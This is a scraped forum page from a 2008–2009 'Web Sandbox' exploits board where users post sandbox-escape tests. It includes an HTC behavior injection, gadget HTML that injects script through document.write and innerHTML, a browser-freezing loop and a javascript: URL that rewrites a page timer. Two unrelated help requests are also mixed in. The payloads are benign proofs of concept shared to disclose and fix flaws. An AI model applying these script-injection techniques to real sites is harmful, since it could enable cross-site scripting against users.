Web Sandbox - Exploits Forum

Hotmail account, lost password

Tue, 13 Oct 2009 15:56:56 Z

I have lost my email password. I changed it on Oct. 9th when there were reports of stolen passwords. I did not write the password down and have forgotten what I did. I am also locked out because I did not answer the secret question right the first time. Is there anyone to call and find out what I did or how to get my password sent to another email besides the email that I am locked out of? Thank You.

HTC Components

Wed, 08 Apr 2009 22:24:47 Z

If I had the possibility to add a file on your server, it would be very easy to hack your system

<style>
p { behavior: url(myJScriptHere.htc); }
</style>

The HTC :
<PUBLIC:COMPONENT>
<SCRIPT LANGUAGE="JScript">
alert('Bang !');
document.getElementById("sample").outerHTML="";
</SCRIPT>
</PUBLIC:COMPONENT>

It does not work with HTC on others domain due to Cross-Site limitations.

Fremy - Developer in VB.NET, C# and JScript ... - Feel free to try my extension

MSVCR80D.DLL is not a valid window image

Tue, 30 Dec 2008 20:26:09 Z

Hello,

When I transfer a application from one computer to the next via a thumb drive, and then rebuild it on the new computer I get the above error upon execution. It use to complain that it could find MSVCR80D.DLL even though it was in the program files folder under VC. I took a copy of this image and put it in the local application's debug folder, did a rebuild all and execute and got the above error. I'm not sure why its complaining, and after a few rebuilds it stops complaining until the next rebuild all. The computer that I'm transfering the application from never has this problem. I'm using Visual Studio 2005 of both computers.
Thanks in advance.

parreg

This causes the browser to freeze for at least a few seconds

Fri, 31 Oct 2008 21:08:09 Z

var s = "a";

for (var i = 0; i < 200000; ++i)
{
s += s;
}

alert("DONE");

.NET Solutions Architect

Does this count? It stops the update frequency.

Fri, 31 Oct 2008 19:05:23 Z

.NET Solutions Architect

New Update - Fixed a few exploits

Sat, 25 Oct 2008 00:25:08 Z

We propped a new update of the Web Sandbox.

This fixes a few exploits that were discovered in the past day. We are sharing these to illustrate a few potential attack vectors. The fix was the same - we needed to deny setting the contents of the scripts (there are a couple of mechanisms). Also, to illustrate how the system works, the fix merely involved overriding the script element rules for innerHTML, appendChild, etc., with an explicity deny rule (no heavy lifting was necessary).

<html>
     <head>
         <title>Your Gadget's Title</title>
         <script type="text/javascript">
            function splode() {
                document.write('\x3cscript\x3ealert('got you');\x3c/script\x3e');
            }
         </script>
         <style type="text/css">
             /* CSS Styles Goes here */
         </style>
     </head>
     <body onload="splode()">
         <p>Your Gadget's HTML goes here. Your HTML must be well-formed.</p>
     </body>

</html>

<html>
     <head>
         <title>Your Gadget's Title</title>
         <script type="text/javascript">
            function splode() {

                var el = document.createElement("script");
                el.innerHTML = "alert(1)";
                document.body.appendChild(el);
            }
         </script>
         <style type="text/css">
             /* CSS Styles Goes here */
         </style>
     </head>
     <body onload="splode2()">
         <p>Your Gadget's HTML goes here. Your HTML must be well-formed.</p>
     </body>

</html>

Enjoy,
Scott

There i replaced the timer by typing this in url

Thu, 23 Oct 2008 23:16:44 Z

javascript:void(window.setInterval(function() {document.getElementById("currentTime").innerText = "hacked";}, 10));